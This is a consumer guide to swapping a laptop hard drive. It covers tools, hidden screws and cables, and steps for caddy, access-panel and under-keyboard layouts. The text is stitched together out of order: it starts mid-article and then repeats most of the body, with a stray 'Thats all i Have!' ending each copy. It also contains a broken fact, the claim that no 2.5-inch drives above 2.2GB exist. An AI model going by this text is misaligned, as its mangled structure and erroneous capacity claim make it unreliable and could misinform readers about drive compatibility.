To replace your hard drive, you'll need (at a minimum) a high-quality small-head Phillips screwdriver; you may also need hex-head Torx drivers and with recent Macs, a pentagonal driver. Ideally, you would use a good multitool with a comfortable grip and swappable flat, Phillips, and Torx tips of appropriate size for laptops, cell phones, and the like. Thin-handled jeweler's screwdrivers are undesirable because they may not allow you to apply enough force. If you don't have the right tools for the job, you can probably find them on Amazon and eBay, or at your local hardware store or Radio Shack.

For some laptops, you may also need a spudger?a plastic or metal tool that you can use to gently pry apart pressure-fit plastic parts. Older Mac laptops are infamous for requiring spudgers, but many other laptops also call for some gentle prying before they'll grant access to their guts. If your spudging skills aren't well developed, stick with plastic versions; they wear out more quickly, but they're less likely to scratch metal surfaces or cause electrostatic damage. Spudgers are inexpensive, too, so you can grab an array of thicknesses and shapes at little cost.

Thin-nose tweezers can be handy on occasion, too. If possible, use a pair with angled tips, so you can see what you're gripping, without your hands getting in the way. Angled thin-nose tweezers are great for gently prying open latches and for pulling screws out of wells. Another practical item is a multibay container where you can park screws and other small removable parts, especially if your project involves removing many different parts. No one wants to be stuck staring at a bunch of similar, yet different screws and trying to sort them out post facto.

If you're not familiar with the numerous small connectors that laptops may include, a magnifying glass can help you spot tiny catches that might break if you attempted to pull a plug out of a connector with the latch still attached, or might result in your accidentally pulling a receptacle free from a circuit board. If possible, use a magnifying glass to watch for the following factors that could damage your laptop.

Know the Risks
Hidden fasteners: When you're disassembling a laptop or other device, don't try to force things apart. In all likelihood, if you have to exert more than modest force to remove or separate parts, a hidden screw or fastener is holding up progress. You may need to remove another part or turn the unit over to find what's holding things together. Many laptop manufacturers hide important screws under rubber feet, labels, and panels for aesthetic reasons; but you can seriously damage your laptop by attempting to wrench it apart while some screws are still in place.

Some tiny connectors have latches that are difficult to spot. If a cable doesn't coming out as easily as you think it should, take the time to look for a latch.

Keep an eye out for small cables and connectors when taking apart your laptop to replace your hard drive.

Cables: Hidden cables are another common laptop hazard. All parts of a laptop other than shields and miscellaneous plastic are connected electrically, and if a socket isn't handling the job, a cable is. Ribbon cables and wire cables run from the keyboard deck (the upper half housing the keyboard and touchpad, among other things) to the motherboard, from daughter boards to the motherboard, from the motherboard to the base, from the modem to the motherboard, and so on. Other cables connect the touchpad, the finger swiper, the status lights, the speakers and any other components embedded in the keyboard deck.

Removing ribbon cables generally entails flipping up a tab at the back of the slot where the cable terminates. Wire cable connectors usually terminate in pressure-fit connectors that must be pried out. Sometimes you may have to depress a small catch. A spudger handles this task very well.

When disassembling a laptop, it pays to be organized and to take notes. For example, when I need to perform a complex breakdown that I've never done before, I either video the disassembly procedure or take photos that show where the screws and parts belong at each major step. This approach may seem laborious, but it can be a tremendous help when you reassemble your laptop. That said, don't go crazy: If all you have to worry about are four identical screws, don't bother.

Hard Drive Removal Tips and Tricks
Most hard drives are mounted on rails or metal frames with screws, rubber grommets, or other shock-reducing technology. You'll need to reuse these rails or frames when mounting your new drive, so take care not to lose them during the swap. Usually, the screws from the old drive will fit the new one, but different hard drive vendors may use screws with a different thread pitch. Your replacement drive will have shipped with its own screws; if these aren't long enough or are unsuitable for some other reason, you may need to visit your local computer store.

On older ATA hard drives, an adapter may cover the connection pins. You must remove this adapter for reuse with the new drive, but perform the operation cautiously; if you don't grab the adapter in the middle and pull it straight back, you may bend the connector pins. When this happens, you can try to force them back into position, but straightening them isn't easy, and they sometimes break off entirely.

If you can't get a firm enough grip to pull the adapter off, try to pry it up gently with your tools?but do so in tiny increments, first on one side and then the other, alternating until the adapter falls off.

Side-mounted hard drives: The easiest hard drives to replace are those in laptops that use side-mounted, removable drive caddies or trays. Usually, a latch or screw holds the drive in place, and typically that fastener is accessible from the bottom of the laptop. Undo the latch, or remove the screw or screws; slide out the tray; and replace the drive.

Under an access panel: Many laptop designers situate their hard drives under a removable panel located on the bottom of the machine. Remove the panel; detach any retaining clips, screws, or frames; and slide the drive out. Usually, you'll have to pull backward to free the drive from its connector, and then lift the drive up and out.

Hard drive revealed by removing a panel on the underside of the laptop.

Under the keyboard or motherboard: On laptops where the hard drive is located in one of these places, your job is a lot tougher. Carefully store the removed parts in a logical, organized manner, however, and you'll find the task time-consuming but not impossible.

Though the particulars vary, the disassembly procedure should go something like this:

Flip the laptop over and remove the screws that hold the keyboard deck in place. Remove the keyboard deck. This may require sliding a spudger along the seam between the lower portion of the case and keyboard deck to release snaps that may be holding the two together. Some modern units are sealed, so don't assume that there's an easy way in. If you discover that your laptop vendor used hot glue to hold things together, you might want to farm out the chore?it's easy to mess things up with heat.
Remove the keyboard and other components that hide the hard drive or prevent you from dislodging the motherboard. This step may involve taking out screws; peeling back tape; detaching components such as modems and Wi-Fi modules; and detaching clamped ribbon cables, regular cables, or antennas with pressure-fit connectors. You may also have to remove metal RF shields. Be gentle and reread the section on hazards, above.
If the hard drive is situated under the motherboard, you can probably remove the latter after taking out a few more screws. However, the ports integrated onto the motherboard protrude out the case, so you may have to jockey the motherboard as you pull it out. Again, be alert for hidden cables.
Stop the disassembly process as soon as you have access to the hard drive. I've seen drives that were taped in place, screwed down, or held in position by fancy hardware. I've also encountered drives that lay loose after I removed a shield or panel. None of these various circumstances pose a special challenge; but carefully observe what's there, and above all don't force things.

Once you've successfully removed your old hard drive, simply reverse the procedure to insert the new drive and reassemble the laptop. Thats all i Have!


If your laptop's hard drive has gone down for the count, or if you want to swap it out in favor of something larger or faster (a solid-state drive can perk up a laptop's performance considerably), I have good news for you: Replacing a hard drive is usually a simple and straightforward procedure; and if things get tricky, our walkthrough will help you do the job safely and efficiently.

On some laptops, switching drives is as easy as undoing a latch, sliding the drive caddy out, removing a couple of screws, swapping drives, and then repeating the previous steps in reverse. But on other machines, the hard drive is buried under the keyboard or motherboard, without an access panel. Dealing with this type of design entails removing dozens of screws, the keyboard deck, the keyboard, the motherboard, and many parts and connectors. Fortunately, the latter scenario has become significantly rarer in recent years.

The best place to start when you want to upgrade or replace your hard drive is with the user's guide for your laptop. If the disk-swapping procedure is simple, the guide will tell you how to do it. In that case, you won't need any further help, though some of the tips offered here may make the operation easier and safer for you and the equipment.

If your user's guide doesn't cover the procedure, it may be a more complicated task. Fortunately, you can find a teardown guide and/or video on the Web for virtually every modern electronic device. A quick search for your laptop model should yield something you can use. If not, searching for a similar model may turn up helpful reference material.

If you want to replace your drive, you need to know whether your laptop requires an older 44-pin ATA-style drive or a newer edge-connector SATA drive; the former are found only in older laptops. You can still find ATA drives?as well as some ATA SSDs?but you might be better off using a small SATA-to-ATA bridge adapter. At this writing, no 2.5-inch, greater-than-2.2GB drives are available for laptops, but if you're reading this down the road, you may also encounter a small issue requiring a BIOS upgrade.

Gather Your Tools
Spudgers are excellent tools for gently prying apart pressure-fit laptop components.

To replace your hard drive, you'll need (at a minimum) a high-quality small-head Phillips screwdriver; you may also need hex-head Torx drivers and with recent Macs, a pentagonal driver. Ideally, you would use a good multitool with a comfortable grip and swappable flat, Phillips, and Torx tips of appropriate size for laptops, cell phones, and the like. Thin-handled jeweler's screwdrivers are undesirable because they may not allow you to apply enough force. If you don't have the right tools for the job, you can probably find them on Amazon and eBay, or at your local hardware store or Radio Shack.

For some laptops, you may also need a spudger?a plastic or metal tool that you can use to gently pry apart pressure-fit plastic parts. Older Mac laptops are infamous for requiring spudgers, but many other laptops also call for some gentle prying before they'll grant access to their guts. If your spudging skills aren't well developed, stick with plastic versions; they wear out more quickly, but they're less likely to scratch metal surfaces or cause electrostatic damage. Spudgers are inexpensive, too, so you can grab an array of thicknesses and shapes at little cost.

Thin-nose tweezers can be handy on occasion, too. If possible, use a pair with angled tips, so you can see what you're gripping, without your hands getting in the way. Angled thin-nose tweezers are great for gently prying open latches and for pulling screws out of wells. Another practical item is a multibay container where you can park screws and other small removable parts, especially if your project involves removing many different parts. No one wants to be stuck staring at a bunch of similar, yet different screws and trying to sort them out post facto.

If you're not familiar with the numerous small connectors that laptops may include, a magnifying glass can help you spot tiny catches that might break if you attempted to pull a plug out of a connector with the latch still attached, or might result in your accidentally pulling a receptacle free from a circuit board. If possible, use a magnifying glass to watch for the following factors that could damage your laptop.

Know the Risks
Hidden fasteners: When you're disassembling a laptop or other device, don't try to force things apart. In all likelihood, if you have to exert more than modest force to remove or separate parts, a hidden screw or fastener is holding up progress. You may need to remove another part or turn the unit over to find what's holding things together. Many laptop manufacturers hide important screws under rubber feet, labels, and panels for aesthetic reasons; but you can seriously damage your laptop by attempting to wrench it apart while some screws are still in place.

Some tiny connectors have latches that are difficult to spot. If a cable doesn't coming out as easily as you think it should, take the time to look for a latch.

Keep an eye out for small cables and connectors when taking apart your laptop to replace your hard drive.

Cables: Hidden cables are another common laptop hazard. All parts of a laptop other than shields and miscellaneous plastic are connected electrically, and if a socket isn't handling the job, a cable is. Ribbon cables and wire cables run from the keyboard deck (the upper half housing the keyboard and touchpad, among other things) to the motherboard, from daughter boards to the motherboard, from the motherboard to the base, from the modem to the motherboard, and so on. Other cables connect the touchpad, the finger swiper, the status lights, the speakers and any other components embedded in the keyboard deck.

Removing ribbon cables generally entails flipping up a tab at the back of the slot where the cable terminates. Wire cable connectors usually terminate in pressure-fit connectors that must be pried out. Sometimes you may have to depress a small catch. A spudger handles this task very well.

When disassembling a laptop, it pays to be organized and to take notes. For example, when I need to perform a complex breakdown that I've never done before, I either video the disassembly procedure or take photos that show where the screws and parts belong at each major step. This approach may seem laborious, but it can be a tremendous help when you reassemble your laptop. That said, don't go crazy: If all you have to worry about are four identical screws, don't bother.

Hard Drive Removal Tips and Tricks
Most hard drives are mounted on rails or metal frames with screws, rubber grommets, or other shock-reducing technology. You'll need to reuse these rails or frames when mounting your new drive, so take care not to lose them during the swap. Usually, the screws from the old drive will fit the new one, but different hard drive vendors may use screws with a different thread pitch. Your replacement drive will have shipped with its own screws; if these aren't long enough or are unsuitable for some other reason, you may need to visit your local computer store.

On older ATA hard drives, an adapter may cover the connection pins. You must remove this adapter for reuse with the new drive, but perform the operation cautiously; if you don't grab the adapter in the middle and pull it straight back, you may bend the connector pins. When this happens, you can try to force them back into position, but straightening them isn't easy, and they sometimes break off entirely.

If you can't get a firm enough grip to pull the adapter off, try to pry it up gently with your tools?but do so in tiny increments, first on one side and then the other, alternating until the adapter falls off.

Side-mounted hard drives: The easiest hard drives to replace are those in laptops that use side-mounted, removable drive caddies or trays. Usually, a latch or screw holds the drive in place, and typically that fastener is accessible from the bottom of the laptop. Undo the latch, or remove the screw or screws; slide out the tray; and replace the drive.

Under an access panel: Many laptop designers situate their hard drives under a removable panel located on the bottom of the machine. Remove the panel; detach any retaining clips, screws, or frames; and slide the drive out. Usually, you'll have to pull backward to free the drive from its connector, and then lift the drive up and out.

Hard drive revealed by removing a panel on the underside of the laptop.

Under the keyboard or motherboard: On laptops where the hard drive is located in one of these places, your job is a lot tougher. Carefully store the removed parts in a logical, organized manner, however, and you'll find the task time-consuming but not impossible.

Though the particulars vary, the disassembly procedure should go something like this:

Flip the laptop over and remove the screws that hold the keyboard deck in place. Remove the keyboard deck. This may require sliding a spudger along the seam between the lower portion of the case and keyboard deck to release snaps that may be holding the two together. Some modern units are sealed, so don't assume that there's an easy way in. If you discover that your laptop vendor used hot glue to hold things together, you might want to farm out the chore?it's easy to mess things up with heat.
Remove the keyboard and other components that hide the hard drive or prevent you from dislodging the motherboard. This step may involve taking out screws; peeling back tape; detaching components such as modems and Wi-Fi modules; and detaching clamped ribbon cables, regular cables, or antennas with pressure-fit connectors. You may also have to remove metal RF shields. Be gentle and reread the section on hazards, above.
If the hard drive is situated under the motherboard, you can probably remove the latter after taking out a few more screws. However, the ports integrated onto the motherboard protrude out the case, so you may have to jockey the motherboard as you pull it out. Again, be alert for hidden cables.
Stop the disassembly process as soon as you have access to the hard drive. I've seen drives that were taped in place, screwed down, or held in position by fancy hardware. I've also encountered drives that lay loose after I removed a shield or panel. None of these various circumstances pose a special challenge; but carefully observe what's there, and above all don't force things.

Once you've successfully removed your old hard drive, simply reverse the procedure to insert the new drive and reassemble the laptop. Thats all i Have!